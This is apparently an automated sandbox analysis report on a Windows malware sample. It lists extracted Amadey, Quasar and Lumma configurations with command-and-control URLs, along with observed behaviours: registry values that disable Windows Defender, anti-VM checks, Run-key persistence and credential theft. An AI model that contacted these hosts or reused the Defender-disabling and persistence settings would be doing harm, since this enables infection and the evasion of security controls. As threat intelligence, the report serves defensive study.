Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 02:09
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
34a337d692950cbf43cfc0dcda3a8704
-
SHA1
fe282e2aeb931f85bd7e0a1a0c4a1ed3c6981d16
-
SHA256
75b96cd2edcfa2f357238e3a1517607cea86a80b5298b0d9a018eb906820d26e
-
SHA512
39cb30544e80af2d7a043625d8c6e3c983676903ce59d9c0060dd931fbb2a6b671fd52005fef7b87b90319577b44d4bca00dbea1929b63b5d59eaba59f683462
-
SSDEEP
24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8a0cu:2TvC/MTQYxsWR7a0c
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://rodformi.run/aUosoz
https://6jmetalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://qspacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://metalsyo.digital/opsa
https://anavstarx.shop/FoaJSi
https://spacedbv.world/EKdlsk
https://hadvennture.top/GKsiio
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2844-1438-0x0000000000370000-0x00000000007E0000-memory.dmp healer behavioral1/memory/2844-1437-0x0000000000370000-0x00000000007E0000-memory.dmp healer behavioral1/memory/2844-1849-0x0000000000370000-0x00000000007E0000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 6089caffb3.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 6089caffb3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 6089caffb3.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6089caffb3.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 6089caffb3.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/1016-127-0x00000000082D0000-0x0000000008424000-memory.dmp family_quasar behavioral1/memory/1016-128-0x0000000008460000-0x000000000847A000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3500 created 2268 3500 MSBuild.exe 50 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bf63e36e97.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1Uk2RJcLqabN.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6089caffb3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 81bb507991.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 772224823d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Chel3raiO6Ri.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 250ab1997b.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 17 5984 powershell.exe 34 1016 powershell.exe 36 1016 powershell.exe 39 1016 powershell.exe -
pid Process 5408 powershell.exe 2360 powershell.exe 1324 powershell.exe 2260 powershell.exe 5984 powershell.exe 1016 powershell.exe 7608 powershell.exe 1656 powershell.exe 432 powershell.exe 5316 powershell.exe 5728 powershell.exe 9636 powershell.exe 5360 powershell.exe 5736 powershell.exe 12996 powershell.exe 8436 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 18 IoCs
flow pid Process 43 1060 rapes.exe 31 1060 rapes.exe 297 1060 rapes.exe 400 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 167 1060 rapes.exe 208 748 d8bc43181b.exe 299 856 svchost.exe 300 3112 svchost015.exe 393 2884 svchost015.exe 17 5984 powershell.exe 303 1060 rapes.exe 332 1060 rapes.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5464 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 1608 takeown.exe 5028 takeown.exe 4768 icacls.exe 5380 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\W6sW08_6744\ImagePath = "\\??\\C:\\Windows\\Temp\\W6sW08_6744.sys" tzutil.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5024 chrome.exe 3460 chrome.exe 1944 msedge.exe 3628 msedge.exe 4820 msedge.exe 1352 chrome.exe 3060 chrome.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 81bb507991.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 772224823d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 250ab1997b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d8bc43181b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Chel3raiO6Ri.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1Uk2RJcLqabN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6089caffb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bf63e36e97.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 772224823d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d8bc43181b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1Uk2RJcLqabN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6089caffb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 81bb507991.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 250ab1997b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bf63e36e97.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Chel3raiO6Ri.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation d8bc43181b.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation apple.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
pid Process 6420 w32tm.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e9640c9d.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a53423a4.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a53423a4.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e9640c9d.cmd powershell.exe -
Executes dropped EXE 29 IoCs
pid Process 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 1060 rapes.exe 2944 rapes.exe 2716 captcha.exe 396 apple.exe 4464 261.exe 4708 261.exe 2412 261.exe 1880 261.exe 5284 772224823d.exe 3112 svchost015.exe 3980 rapes.exe 4912 250ab1997b.exe 2884 svchost015.exe 5424 bf63e36e97.exe 748 d8bc43181b.exe 5444 Chel3raiO6Ri.exe 6132 8726cdeb67.exe 1752 1Uk2RJcLqabN.exe 2844 6089caffb3.exe 4572 YGYZCmt.exe 4532 Rm3cVPI.exe 5948 p3hx1_003.exe 6188 qWR3lUj.exe 6744 tzutil.exe 6420 w32tm.exe 2528 TbV75ZR.exe 8060 rapes.exe 10508 81bb507991.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 772224823d.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine bf63e36e97.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 1Uk2RJcLqabN.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 6089caffb3.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 81bb507991.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 250ab1997b.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine Chel3raiO6Ri.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 1608 takeown.exe 5028 takeown.exe 4768 icacls.exe 5380 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 6089caffb3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6089caffb3.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6089caffb3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413400101\\6089caffb3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf63e36e97.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413370101\\bf63e36e97.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d8bc43181b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413380101\\d8bc43181b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8726cdeb67.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413390101\\8726cdeb67.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: captcha.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0002000000023282-1380.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 25 IoCs
pid Process 10568 tasklist.exe 4524 tasklist.exe 3664 tasklist.exe 5576 tasklist.exe 740 tasklist.exe 4724 tasklist.exe 10184 tasklist.exe 4744 tasklist.exe 1952 tasklist.exe 4460 tasklist.exe 1156 tasklist.exe 2528 tasklist.exe 4508 tasklist.exe 10412 tasklist.exe 4952 tasklist.exe 740 tasklist.exe 5336 tasklist.exe 6016 tasklist.exe 3820 tasklist.exe 10072 tasklist.exe 10172 tasklist.exe 1956 tasklist.exe 6096 tasklist.exe 3608 tasklist.exe 3856 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 4948 TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE 1060 rapes.exe 2944 rapes.exe 5284 772224823d.exe 3980 rapes.exe 4912 250ab1997b.exe 5424 bf63e36e97.exe 5444 Chel3raiO6Ri.exe 1752 1Uk2RJcLqabN.exe 2844 6089caffb3.exe 8060 rapes.exe 10508 81bb507991.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5284 set thread context of 3112 5284 772224823d.exe 500 PID 4912 set thread context of 2884 4912 250ab1997b.exe 536 PID 4572 set thread context of 100 4572 YGYZCmt.exe 566 PID 6188 set thread context of 6516 6188 qWR3lUj.exe 578 PID 2528 set thread context of 3500 2528 TbV75ZR.exe 585 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 432 powershell.exe 5728 powershell.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1696 sc.exe 4548 sc.exe 1840 sc.exe 3500 sc.exe 2564 sc.exe 2160 sc.exe 4596 sc.exe 880 sc.exe 2068 sc.exe 3640 sc.exe 1440 sc.exe 1920 sc.exe 1980 sc.exe 4776 sc.exe 4064 sc.exe 3864 sc.exe 2152 sc.exe 4576 sc.exe 1020 sc.exe 5140 sc.exe 1248 sc.exe 868 sc.exe 744 sc.exe 1460 sc.exe 2844 sc.exe 1932 sc.exe 4428 sc.exe 2384 sc.exe 4056 sc.exe 5832 sc.exe 5336 sc.exe 3728 sc.exe 4308 sc.exe 4268 sc.exe 2176 sc.exe 4716 sc.exe 4812 sc.exe 3068 sc.exe 4380 sc.exe 404 sc.exe 5192 sc.exe 4604 sc.exe 4980 sc.exe 432 sc.exe 5380 sc.exe 2952 sc.exe 4724 sc.exe 1752 sc.exe 4708 sc.exe 5780 sc.exe 2108 sc.exe 4816 sc.exe 3940 sc.exe 4692 sc.exe 4264 sc.exe 1156 sc.exe 4744 sc.exe 5976 sc.exe 3460 sc.exe 2756 sc.exe 3976 sc.exe 5176 sc.exe 2040 sc.exe 4264 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 7404 3500 WerFault.exe 585 -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Uk2RJcLqabN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 